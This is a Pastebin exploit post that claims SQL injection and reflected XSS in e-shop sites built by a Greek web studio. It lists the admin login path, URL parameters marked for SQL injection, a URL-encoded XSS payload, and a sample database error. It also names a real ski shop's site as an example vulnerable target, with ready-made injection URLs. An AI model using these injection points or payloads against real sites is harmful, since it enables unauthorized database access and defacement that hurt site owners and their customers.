KingSkrupellos

LS Web Design Lab21 Greece Reflected XSS SQL Injection

Jun 10th, 2019
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.38 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : LS Web Design Lab21 Greece Reflected XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 09/06/2019
  7. # Vendor Homepage : lswebsitedesigns.com - lab21.gr
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18. # Source : cxsecurity.com/issue/WLB-2019060052
  19.  
  20. ###################################################################
  21.  
  22. Description About Software :
  23. **************************
  24. Lab21 is a digital bureau based in Athens, Greece that specializes in UX driven
  25. websites, e-shops, portals, blogs and all aspects of web development. Their web
  26. development studio was founded in 2010 by Mayra Metaxa, a computer science
  27. graduate with over 8 years experience in web development.
  28.  
  29. ###################################################################
  30.  
  31. # Impact :
  32. ***********
  33. LS Web Design Lab21 Greece is prone to an SQL-injection
  34. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  35. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  36. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  37. A remote attacker can send a specially crafted request to the vulnerable application and
  38. execute arbitrary SQL commands in application`s database. Further exploitation of this
  39. vulnerability may result in unauthorized data manipulation.
  40. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  41.  
  42. Reflected XSS (or Non-Persistent) :
  43. ***************************************
  44. The server reads data directly from the HTTP request and reflects it back in the HTTP
  45. response. Reflected XSS exploits occur when an attacker causes a victim to supply
  46. dangerous content to a vulnerable web application, which is then reflected back to the victim
  47. and executed by the web browser. The most common mechanism for delivering malicious
  48. content is to include it as a parameter in a URL that is posted publicly or e-mailed directly
  49. to the victim. URLs constructed in this manner constitute the core of many phishing
  50. schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable
  51. site. After the site reflects the attacker's content back to the victim,the content is executed
  52. by the victim's browser.
  53.  
  54. ###################################################################
  55.  
  56. # Admin Panel Login Path :
  57. ************************
  58. /admin/
  59.  
  60. # SQL Injection Exploit :
  61. **********************
  62. /by_brand_full.php?catID=[ID-NUMBER]&priceID=[ID-NUMBER]&sexID=
  63. [ID-NUMBER]&levelID=[ID-NUMBER]&brandID=[SQL Injection]
  64.  
  65. /products_full.php?parentID=[ID-NUMBER]&catID=[SQL Injection]
  66.  
  67. /products_full.php?parentID=[SQL Injection]
  68.  
  69. # Cross Site Scripting XSS Exploit :
  70. ********************************
  71. /by_brand_full.php?catID=5&priceID=0&sexID=0&levelID=0&
  72. brandID=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-
  73. Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  74.  
  75. ###################################################################
  76.  
  77. # Example Vulnerable Sites :
  78. *************************
  79. [+] klaoudatos-skishop.gr/by_brand_full.php?catID=5&priceID=0&sexID=0&levelID=0&brandID=1%27
  80.  
  81. [+] klaoudatos-skishop.gr/by_brand_full.php?catID=5&priceID=0&sexID=0&levelID=0&
  82. brandID=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-
  83. Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  84.  
  85. ###################################################################
  86.  
  87. # Example SQL Database Error :
  88. ****************************
  89. You have an error in your SQL syntax; check the manual that corresponds to
  90. your MariaDB server version for the right syntax to use near ''1''' at line 1
  91.  
  92. ###################################################################
  93.  
  94. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  95.  
  96. ###################################################################
Add Comment
Please, Sign In to add comment